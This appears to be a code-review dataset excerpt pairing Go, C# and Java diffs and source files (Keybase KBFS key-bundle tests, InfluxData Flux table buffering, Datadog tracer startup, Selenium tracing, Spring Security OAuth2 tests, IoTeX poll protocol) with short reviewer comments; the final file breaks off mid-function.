crypto := MakeCryptoCommon(codec)
id1, err := crypto.GetTLFCryptKeyServerHalfID(uid1, key1, half1)
require.NoError(t, err)
id2, err := crypto.GetTLFCryptKeyServerHalfID(uid2, key2, half2)
require.NoError(t, err)
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3, uid4}, nil, nil, nil)
require.NoError(t, err)
brmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
extra := FakeInitialRekey(brmd, bh, kbfscrypto.TLFPublicKey{})
wkb, rkb, err := brmd.getTLFKeyBundles(extra)
require.NoError(t, err)
*wkb = TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{
key1: TLFCryptKeyInfo{
ServerHalfID: id1,
EPubKeyIndex: 0,
},
},
uid2: DeviceKeyInfoMapV3{
key2: TLFCryptKeyInfo{
ServerHalfID: id2,
EPubKeyIndex: 1,
},
},
},
}
*rkb = TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{},
uid4: DeviceKeyInfoMapV3{},
},
}
updatedWriterKeys := UserDevicePublicKeys{
uid1: {},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {},
}
removalInfo, err := brmd.RevokeRemovedDevices(
updatedWriterKeys, updatedReaderKeys, extra)
require.NoError(t, err)
require.Equal(t, ServerHalfRemovalInfo{
uid1: userServerHalfRemovalInfo{
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key1: []TLFCryptKeyServerHalfID{id1},
},
},
uid2: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{
key2: []TLFCryptKeyServerHalfID{id2},
},
},
uid4: userServerHalfRemovalInfo{
userRemoved: true,
deviceServerHalfIDs: deviceServerHalfRemovalInfo{},
},
}, removalInfo)
expectedWKB := TLFWriterKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid1: DeviceKeyInfoMapV3{},
},
}
require.Equal(t, expectedWKB, *wkb)
expectedRKB := TLFReaderKeyBundleV3{
Keys: UserDeviceKeyInfoMapV3{
uid3: DeviceKeyInfoMapV3{},
},
}
require.Equal(t, expectedRKB, *rkb)
}
// expectedRekeyInfoV3 contains all the information needed to check a
// rekey run (that doesn't add a generation).
//
// If writerPrivKeys is empty, then writerEPubKeyIndex is ignored, and
// similarly for readerPrivKeys. If both are empty, then ePubKey is
// also ignored.
type expectedRekeyInfoV3 struct {
writerPrivKeys, readerPrivKeys userDevicePrivateKeys
serverHalves UserDeviceKeyServerHalves
writerEPubKeyIndex, readerEPubKeyIndex int
ePubKey kbfscrypto.TLFEphemeralPublicKey
}
// checkGetTLFCryptKeyV3 checks that wkb and rkb contain the info
// necessary to get the TLF crypt key for each user in expected, which
// must all match expectedTLFCryptKey.
func checkGetTLFCryptKeyV3(t *testing.T, expected expectedRekeyInfoV3,
expectedTLFCryptKey kbfscrypto.TLFCryptKey,
wkb *TLFWriterKeyBundleV3, rkb *TLFReaderKeyBundleV3) {
for uid, privKeys := range expected.writerPrivKeys {
for privKey := range privKeys {
pubKey := privKey.GetPublicKey()
serverHalf, ok := expected.serverHalves[uid][pubKey]
require.True(t, ok, "writer uid=%s, key=%s",
uid, pubKey)
info, ok := wkb.Keys[uid][pubKey]
require.True(t, ok)
ePubKey := wkb.TLFEphemeralPublicKeys[info.EPubKeyIndex]
checkCryptKeyInfo(t, privKey, serverHalf,
expected.writerEPubKeyIndex, expected.ePubKey,
expectedTLFCryptKey, info, ePubKey)
}
}
for uid, privKeys := range expected.readerPrivKeys {
for privKey := range privKeys {
pubKey := privKey.GetPublicKey()
serverHalf, ok := expected.serverHalves[uid][pubKey]
require.True(t, ok, "reader uid=%s, key=%s",
uid, pubKey)
info, ok := rkb.Keys[uid][pubKey]
require.True(t, ok)
ePubKey := rkb.TLFEphemeralPublicKeys[info.EPubKeyIndex]
checkCryptKeyInfo(t, privKey, serverHalf,
expected.readerEPubKeyIndex, expected.ePubKey,
expectedTLFCryptKey, info, ePubKey)
}
}
}
func userDeviceKeyInfoMapV3ToPublicKeys(udkimV3 UserDeviceKeyInfoMapV3) UserDevicePublicKeys {
pubKeys := make(UserDevicePublicKeys)
for uid, dkimV3 := range udkimV3 {
pubKeys[uid] = make(DevicePublicKeys)
for key := range dkimV3 {
pubKeys[uid][key] = true
}
}
return pubKeys
}
// checkKeyBundlesV3 checks that wkb and rkb contain exactly the info
// expected from expectedRekeyInfos and expectedPubKey.
func checkKeyBundlesV3(t *testing.T, expectedRekeyInfos []expectedRekeyInfoV3,
expectedTLFCryptKey kbfscrypto.TLFCryptKey,
expectedPubKey kbfscrypto.TLFPublicKey,
wkb *TLFWriterKeyBundleV3, rkb *TLFReaderKeyBundleV3) {
expectedWriterPubKeys := make(UserDevicePublicKeys)
expectedReaderPubKeys := make(UserDevicePublicKeys)
var expectedWriterEPublicKeys,
expectedReaderEPublicKeys kbfscrypto.TLFEphemeralPublicKeys
for _, expected := range expectedRekeyInfos {
expectedWriterPubKeys = accumulatePublicKeys(
expectedWriterPubKeys,
expected.writerPrivKeys.toPublicKeys())
expectedReaderPubKeys = accumulatePublicKeys(
expectedReaderPubKeys,
expected.readerPrivKeys.toPublicKeys())
if expected.writerPrivKeys.hasKeys() {
require.Equal(t, expected.writerEPubKeyIndex,
len(expectedWriterEPublicKeys))
expectedWriterEPublicKeys = append(
expectedWriterEPublicKeys,
expected.ePubKey)
}
if expected.readerPrivKeys.hasKeys() {
require.Equal(t, expected.readerEPubKeyIndex,
len(expectedReaderEPublicKeys))
expectedReaderEPublicKeys = append(
expectedReaderEPublicKeys,
expected.ePubKey)
}
}
writerPubKeys := userDeviceKeyInfoMapV3ToPublicKeys(wkb.Keys)
readerPubKeys := userDeviceKeyInfoMapV3ToPublicKeys(rkb.Keys)
require.Equal(t, expectedWriterPubKeys, writerPubKeys)
require.Equal(t, expectedReaderPubKeys, readerPubKeys)
require.Equal(t, expectedWriterEPublicKeys, wkb.TLFEphemeralPublicKeys)
require.Equal(t, expectedReaderEPublicKeys, rkb.TLFEphemeralPublicKeys)
require.Equal(t, expectedPubKey, wkb.TLFPublicKey)
for _, expected := range expectedRekeyInfos {
expectedUserPubKeys := unionPublicKeyUsers(
expected.writerPrivKeys.toPublicKeys(),
expected.readerPrivKeys.toPublicKeys())
userPubKeys := userDeviceServerHalvesToPublicKeys(
expected.serverHalves)
require.Equal(t, expectedUserPubKeys.removeKeylessUsersForTest(), userPubKeys)
checkGetTLFCryptKeyV3(t,
expected, expectedTLFCryptKey, wkb, rkb)
}
}
func TestBareRootMetadataV3UpdateKeyBundles(t *testing.T) {
uid1 := keybase1.MakeTestUID(1)
uid2 := keybase1.MakeTestUID(2)
uid3 := keybase1.MakeTestUID(3)
privKey1 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1")
privKey2 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key2")
privKey3 := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3")
updatedWriterKeys := UserDevicePublicKeys{
uid1: {privKey1.GetPublicKey(): true},
uid2: {privKey2.GetPublicKey(): true},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {privKey3.GetPublicKey(): true},
}
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3},
[]keybase1.SocialAssertion{{}},
nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
ePubKey1, ePrivKey1, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
// Add first key generations, although only the last one
// matters.
latestKeyGen := FirstValidKeyGen + 5
var pubKey kbfscrypto.TLFPublicKey
var tlfCryptKey kbfscrypto.TLFCryptKey
var extra ExtraMetadata
var serverHalves1 UserDeviceKeyServerHalves
for keyGen := FirstValidKeyGen; keyGen <= latestKeyGen; keyGen++ {
fakeKeyData := [32]byte{byte(keyGen)}
pubKey = kbfscrypto.MakeTLFPublicKey(fakeKeyData)
nextTLFCryptKey := kbfscrypto.MakeTLFCryptKey(fakeKeyData)
// Use the same ephemeral keys for initial key
// generations, even though that can't happen in
// practice.
var err error
extra, serverHalves1, err = rmd.AddKeyGeneration(codec,
crypto, extra, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1,
pubKey, tlfCryptKey, nextTLFCryptKey)
require.NoError(t, err)
tlfCryptKey = nextTLFCryptKey
}
wkb, rkb, err := rmd.getTLFKeyBundles(extra)
require.NoError(t, err)
expectedRekeyInfo1 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1: true},
uid2: {privKey2: true},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3: true},
},
serverHalves: serverHalves1,
writerEPubKeyIndex: 0,
readerEPubKeyIndex: 0,
ePubKey: ePubKey1,
}
expectedRekeyInfos := []expectedRekeyInfoV3{expectedRekeyInfo1}
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do update to check idempotency.
tlfCryptKeys := []kbfscrypto.TLFCryptKey{tlfCryptKey}
serverHalves1b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves1b))
expectedRekeyInfo1b := expectedRekeyInfoV3{
serverHalves: serverHalves1b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo1b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Rekey.
privKey1b := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1b")
updatedWriterKeys[uid1][privKey1b.GetPublicKey()] = true
privKey3b := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3b")
updatedReaderKeys[uid3][privKey3b.GetPublicKey()] = true
ePubKey2, ePrivKey2, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
serverHalves2, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey2, ePrivKey2, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves2))
expectedRekeyInfo2 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1b: true},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3b: true},
},
serverHalves: serverHalves2[0],
writerEPubKeyIndex: 1,
readerEPubKeyIndex: 1,
ePubKey: ePubKey2,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo2)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves2b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey2, ePrivKey2, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves2b))
expectedRekeyInfo2b := expectedRekeyInfoV3{
serverHalves: serverHalves2b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo2b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Rekey writers only.
privKey1c := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key1c")
updatedWriterKeys[uid1][privKey1c.GetPublicKey()] = true
ePubKey3, ePrivKey3, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
serverHalves3, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey3, ePrivKey3, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves3))
expectedRekeyInfo3 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {privKey1c: true},
},
readerPrivKeys: nil,
serverHalves: serverHalves3[0],
writerEPubKeyIndex: 2,
readerEPubKeyIndex: -1,
ePubKey: ePubKey3,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo3)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves3b, err := rmd.UpdateKeyBundles(crypto,
extra, updatedWriterKeys, updatedReaderKeys,
ePubKey3, ePrivKey3, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves3b))
expectedRekeyInfo3b := expectedRekeyInfoV3{
serverHalves: serverHalves3b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo3b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Reader rekey.
privKey3c := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3c")
privKey3d := kbfscrypto.MakeFakeCryptPrivateKeyOrBust("key3d")
updatedReaderKeys[uid3][privKey3c.GetPublicKey()] = true
updatedReaderKeys[uid3][privKey3d.GetPublicKey()] = true
ePubKey4, ePrivKey4, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
filteredReaderKeys := UserDevicePublicKeys{
uid3: updatedReaderKeys[uid3],
}
serverHalves4, err := rmd.UpdateKeyBundles(crypto,
extra, nil, filteredReaderKeys,
ePubKey4, ePrivKey4, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves4))
expectedRekeyInfo4 := expectedRekeyInfoV3{
writerPrivKeys: nil,
readerPrivKeys: userDevicePrivateKeys{
uid3: {privKey3c: true, privKey3d: true},
},
serverHalves: serverHalves4[0],
writerEPubKeyIndex: -1,
readerEPubKeyIndex: 2,
ePubKey: ePubKey4,
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo4)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
// Do again to check idempotency.
serverHalves4b, err := rmd.UpdateKeyBundles(crypto,
extra, nil, filteredReaderKeys,
ePubKey4, ePrivKey4, tlfCryptKeys)
require.NoError(t, err)
require.Equal(t, 1, len(serverHalves4b))
expectedRekeyInfo4b := expectedRekeyInfoV3{
serverHalves: serverHalves4b[0],
}
expectedRekeyInfos = append(expectedRekeyInfos, expectedRekeyInfo4b)
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
}
// TestBareRootMetadataV3AddKeyGenerationKeylessUsers checks that
// keyless users are handled properly by AddKeyGeneration.
func TestBareRootMetadataV3AddKeyGenerationKeylessUsers(t *testing.T) {
uid1 := keybase1.MakeTestUID(1)
uid2 := keybase1.MakeTestUID(2)
uid3 := keybase1.MakeTestUID(3)
updatedWriterKeys := UserDevicePublicKeys{
uid1: {},
uid2: {},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {},
}
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3},
[]keybase1.SocialAssertion{{}},
nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
ePubKey1, ePrivKey1, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
// Add first key generation.
fakeKeyData := [32]byte{1}
pubKey := kbfscrypto.MakeTLFPublicKey(fakeKeyData)
tlfCryptKey := kbfscrypto.MakeTLFCryptKey(fakeKeyData)
extra, serverHalves1, err := rmd.AddKeyGeneration(codec,
crypto, nil, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1,
pubKey, kbfscrypto.TLFCryptKey{}, tlfCryptKey)
require.NoError(t, err)
wkb, rkb, err := rmd.getTLFKeyBundles(extra)
require.NoError(t, err)
expectedRekeyInfo1 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {},
uid2: {},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {},
},
serverHalves: serverHalves1,
}
expectedRekeyInfos := []expectedRekeyInfoV3{expectedRekeyInfo1}
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
}
| 1 | 16,906 | Do you think we should have some tests here for `tlf.SingleTeam` too? | keybase-kbfs | go |
@@ -1,6 +1,8 @@
package table
-import "github.com/influxdata/flux"
+import (
+ "github.com/influxdata/flux"
+)
// Copy returns a buffered copy of the table and consumes the
// input table. If the input table is already buffered, it "consumes" | 1 | package table
import "github.com/influxdata/flux"
// Copy returns a buffered copy of the table and consumes the
// input table. If the input table is already buffered, it "consumes"
// the input and returns the same table.
//
// The buffered table can then be copied additional times using the
// BufferedTable.Copy method.
//
// This method should be used sparingly if at all. It will retain
// each of the buffers of data coming out of a table so the entire
// table is materialized in memory. For large datasets, this could
// potentially cause a problem. The allocator is meant to catch when
// this happens and prevent it.
func Copy(t flux.Table) (flux.BufferedTable, error) {
if tbl, ok := t.(flux.BufferedTable); ok {
return tbl, nil
}
tbl := tableBuffer{
key: t.Key(),
colMeta: t.Cols(),
}
if t.Empty() {
return &tbl, nil
}
if err := t.Do(func(cr flux.ColReader) error {
cr.Retain()
tbl.buffers = append(tbl.buffers, cr)
return nil
}); err != nil {
tbl.Done()
return nil, err
}
return &tbl, nil
}
// tableBuffer maintains a buffer of the data within a table.
// It is created by reading a table and using Retain to retain
// a reference to each ColReader that is returned.
//
// This implements the flux.BufferedTable interface.
type tableBuffer struct {
key flux.GroupKey
colMeta []flux.ColMeta
i int
buffers []flux.ColReader
}
func (tb *tableBuffer) Key() flux.GroupKey {
return tb.key
}
func (tb *tableBuffer) Cols() []flux.ColMeta {
return tb.colMeta
}
func (tb *tableBuffer) Do(f func(flux.ColReader) error) error {
defer tb.Done()
for ; tb.i < len(tb.buffers); tb.i++ {
b := tb.buffers[tb.i]
if err := f(b); err != nil {
return err
}
b.Release()
}
return nil
}
func (tb *tableBuffer) Done() {
for ; tb.i < len(tb.buffers); tb.i++ {
tb.buffers[tb.i].Release()
}
}
func (tb *tableBuffer) Empty() bool {
return len(tb.buffers) == 0
}
func (tb *tableBuffer) Buffer(i int) flux.ColReader {
return tb.buffers[i]
}
func (tb *tableBuffer) BufferN() int {
return len(tb.buffers)
}
func (tb *tableBuffer) Copy() flux.BufferedTable {
for i := tb.i; i < len(tb.buffers); i++ {
tb.buffers[i].Retain()
}
return &tableBuffer{
key: tb.key,
colMeta: tb.colMeta,
i: tb.i,
buffers: tb.buffers,
}
}
| 1 | 15,878 | No problem with this but might as well revert this file since nothing else changed. | influxdata-flux | go |
@@ -14,18 +14,7 @@ namespace Datadog.Trace.ClrProfiler.Integrations
/// </summary>
public static void Register()
{
- Tracer.Instance = new Tracer(
- settings: null,
- agentWriter: null,
- sampler: null,
- scopeManager: new AspNetScopeManager(),
- statsd: null);
-
- if (Tracer.Instance.Settings.IsIntegrationEnabled(AspNetHttpModule.IntegrationName))
- {
- // only register http module if integration is enabled
- HttpApplication.RegisterModule(typeof(AspNetHttpModule));
- }
+ HttpApplication.RegisterModule(typeof(AspNetHttpModule));
}
}
} | 1 | #if !NETSTANDARD2_0
using System.Web;
namespace Datadog.Trace.ClrProfiler.Integrations
{
/// <summary>
/// Used as the target of a PreApplicationStartMethodAttribute on the assembly to load the AspNetHttpModule into the pipeline
/// </summary>
public static class AspNetStartup
{
/// <summary>
/// Registers the AspNetHttpModule at ASP.NET startup into the pipeline
/// </summary>
public static void Register()
{
Tracer.Instance = new Tracer(
settings: null,
agentWriter: null,
sampler: null,
scopeManager: new AspNetScopeManager(),
statsd: null);
if (Tracer.Instance.Settings.IsIntegrationEnabled(AspNetHttpModule.IntegrationName))
{
// only register http module if integration is enabled
HttpApplication.RegisterModule(typeof(AspNetHttpModule));
}
}
}
}
#endif
| 1 | 16,092 | In my changes, I did not create a new `AspNetScopeManager`. I'm not familiar with it enough to know if this is a valid change or not | DataDog-dd-trace-dotnet | .cs |
@@ -0,0 +1,3 @@
+export default message => {
+ throw new Error(message);
+}; | 1 | 1 | 5,570 | Not cool with this. I think we talked about it in past. This is a side effect. If we want to introduce the side effect in our functions like `inRange` (which I am for) the side effect (error) should originate in that function and not in some internal `throwError` function. Every stacktract will start at line `2` of `trowError.js`. Been there, done that and falled back to throwing the error from the place where it should be thrown. | char0n-ramda-adjunct | js |
|
@@ -25,6 +25,9 @@ public interface Span extends AutoCloseable, TraceContext {
Span setAttribute(String key, Number value);
Span setAttribute(String key, String value);
+ Span addEvent(String name);
+ Span addEvent(String name, long timestamp);
+
Span setStatus(Status status);
@Override | 1 | // Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.remote.tracing;
public interface Span extends AutoCloseable, TraceContext {
Span setName(String name);
Span setAttribute(String key, boolean value);
Span setAttribute(String key, Number value);
Span setAttribute(String key, String value);
Span setStatus(Status status);
@Override
void close();
enum Kind {
CLIENT("client"),
SERVER("server"),
PRODUCER("producer"),
CONSUMER("consumer"),
;
// The nice name is the name expected in an OT trace.
private final String niceName;
private Kind(String niceName) {
this.niceName = niceName;
}
@Override
public String toString() {
return niceName;
}
}
}
| 1 | 17,759 | We don't need this additional method. | SeleniumHQ-selenium | js |
@@ -44,11 +44,10 @@ public class DelegatingOAuth2UserServiceTests {
}
@Test(expected = IllegalArgumentException.class)
- @SuppressWarnings("unchecked")
public void loadUserWhenUserRequestIsNullThenThrowIllegalArgumentException() {
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(
- Arrays.asList(mock(OAuth2UserService.class), mock(OAuth2UserService.class)));
+ Arrays.asList(mock(DefaultOAuth2UserService.class), mock(DefaultOAuth2UserService.class)));
delegatingUserService.loadUser(null);
}
| 1 | /*
* Copyright 2002-2017 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.security.oauth2.client.userinfo;
import org.junit.Test;
import org.springframework.security.oauth2.core.user.OAuth2User;
import java.util.Arrays;
import java.util.Collections;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.ArgumentMatchers.any;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
/**
* Tests for {@link DelegatingOAuth2UserService}.
*
* @author Joe Grandja
*/
public class DelegatingOAuth2UserServiceTests {
@Test(expected = IllegalArgumentException.class)
public void constructorWhenUserServicesIsNullThenThrowIllegalArgumentException() {
new DelegatingOAuth2UserService<>(null);
}
@Test(expected = IllegalArgumentException.class)
public void constructorWhenUserServicesIsEmptyThenThrowIllegalArgumentException() {
new DelegatingOAuth2UserService<>(Collections.emptyList());
}
@Test(expected = IllegalArgumentException.class)
@SuppressWarnings("unchecked")
public void loadUserWhenUserRequestIsNullThenThrowIllegalArgumentException() {
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(
Arrays.asList(mock(OAuth2UserService.class), mock(OAuth2UserService.class)));
delegatingUserService.loadUser(null);
}
@Test
@SuppressWarnings("unchecked")
public void loadUserWhenUserServiceCanLoadThenReturnUser() {
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService1 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService2 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService3 = mock(OAuth2UserService.class);
OAuth2User mockUser = mock(OAuth2User.class);
when(userService3.loadUser(any(OAuth2UserRequest.class))).thenReturn(mockUser);
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(Arrays.asList(userService1, userService2, userService3));
OAuth2User loadedUser = delegatingUserService.loadUser(mock(OAuth2UserRequest.class));
assertThat(loadedUser).isEqualTo(mockUser);
}
@Test
@SuppressWarnings("unchecked")
public void loadUserWhenUserServiceCannotLoadThenReturnNull() {
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService1 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService2 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService3 = mock(OAuth2UserService.class);
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(Arrays.asList(userService1, userService2, userService3));
OAuth2User loadedUser = delegatingUserService.loadUser(mock(OAuth2UserRequest.class));
assertThat(loadedUser).isNull();
}
}
| 1 | 10,002 | The purpose of this test is to ensure that the `OAuth2UserRequest` passed into `loadUser` is **not** null else throw `IllegalArgumentException`. Changing the `List` of `OAuth2UserService` mocks to `DefaultOAuth2UserService` doesn't really apply to what is being tested here. Please revert this. Thank you. | spring-projects-spring-security | java |
@@ -124,7 +124,7 @@ func NewProtocol(
getkickoutList GetKickoutList,
getUnproductiveDelegate GetUnproductiveDelegate,
electionCommittee committee.Committee,
- stakingV2 *staking.Protocol,
+ stakingProto *staking.Protocol,
getBlockTimeFunc GetBlockTime,
productivity Productivity,
getBlockHash evm.GetBlockHash, | 1 | // Copyright (c) 2019 IoTeX Foundation
// This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
// warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
// permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
// License 2.0 that can be found in the LICENSE file.
package poll
import (
"context"
"math/big"
"time"
"github.com/iotexproject/iotex-election/committee"
"github.com/pkg/errors"
"github.com/iotexproject/iotex-core/action/protocol"
"github.com/iotexproject/iotex-core/action/protocol/execution/evm"
"github.com/iotexproject/iotex-core/action/protocol/staking"
"github.com/iotexproject/iotex-core/action/protocol/vote"
"github.com/iotexproject/iotex-core/config"
"github.com/iotexproject/iotex-core/pkg/log"
"github.com/iotexproject/iotex-core/state"
)
const (
protocolID = "poll"
)
const (
_modeLifeLong = "lifeLong"
_modeGovernanceMix = "governanceMix" // mix governance with native staking contract
	_modeNative        = "native"        // only use go native staking
_modeNativeMix = "nativeMix" // native with backward compatibility for governanceMix before fairbank
_modeConsortium = "consortium"
)
// ErrInconsistentHeight is an error that the result of "readFromStateDB" is not consistent with others
var ErrInconsistentHeight = errors.New("data is inconsistent because the state height has been changed")
// ErrNoElectionCommittee is an error that the election committee is not specified
var ErrNoElectionCommittee = errors.New("no election committee specified")
// ErrProposedDelegatesLength is an error that the proposed delegate list length is not right
var ErrProposedDelegatesLength = errors.New("the proposed delegate list length")
// ErrDelegatesNotAsExpected is an error that the delegates are not as expected
var ErrDelegatesNotAsExpected = errors.New("delegates are not as expected")
// ErrDelegatesNotExist is an error that the delegates cannot be prepared
var ErrDelegatesNotExist = errors.New("delegates cannot be found")
// CandidatesByHeight returns the candidates of a given height
type CandidatesByHeight func(protocol.StateReader, uint64) ([]*state.Candidate, error)
// GetCandidates returns the current candidates
type GetCandidates func(protocol.StateReader, bool) ([]*state.Candidate, uint64, error)
// GetKickoutList returns the current blacklist
type GetKickoutList func(protocol.StateReader, bool) (*vote.Blacklist, uint64, error)
// GetUnproductiveDelegate returns unproductiveDelegate struct which contains a cache of upd info by epochs
type GetUnproductiveDelegate func(protocol.StateReader) (*vote.UnproductiveDelegate, error)
// GetBlockTime defines a function to get block creation time
type GetBlockTime func(uint64) (time.Time, error)
// Productivity returns the number of produced blocks per producer
type Productivity func(uint64, uint64) (map[string]uint64, error)
// Protocol defines the protocol of handling votes
type Protocol interface {
protocol.Protocol
protocol.GenesisStateCreator
Delegates(context.Context, protocol.StateReader) (state.CandidateList, error)
NextDelegates(context.Context, protocol.StateReader) (state.CandidateList, error)
Candidates(context.Context, protocol.StateReader) (state.CandidateList, error)
NextCandidates(context.Context, protocol.StateReader) (state.CandidateList, error)
// CalculateCandidatesByHeight calculates candidate and returns candidates by chain height
CalculateCandidatesByHeight(context.Context, uint64) (state.CandidateList, error)
}
// FindProtocol finds the registered protocol from registry
func FindProtocol(registry *protocol.Registry) Protocol {
if registry == nil {
return nil
}
p, ok := registry.Find(protocolID)
if !ok {
return nil
}
pp, ok := p.(Protocol)
if !ok {
log.S().Panic("fail to cast poll protocol")
}
return pp
}
// MustGetProtocol return a registered protocol from registry
func MustGetProtocol(registry *protocol.Registry) Protocol {
if registry == nil {
log.S().Panic("registry cannot be nil")
}
p, ok := registry.Find(protocolID)
if !ok {
log.S().Panic("poll protocol is not registered")
}
pp, ok := p.(Protocol)
if !ok {
log.S().Panic("fail to cast poll protocol")
}
return pp
}
// NewProtocol instantiates a poll protocol instance.
func NewProtocol(
cfg config.Config,
candidateIndexer *CandidateIndexer,
readContract ReadContract,
candidatesByHeight CandidatesByHeight,
getCandidates GetCandidates,
getkickoutList GetKickoutList,
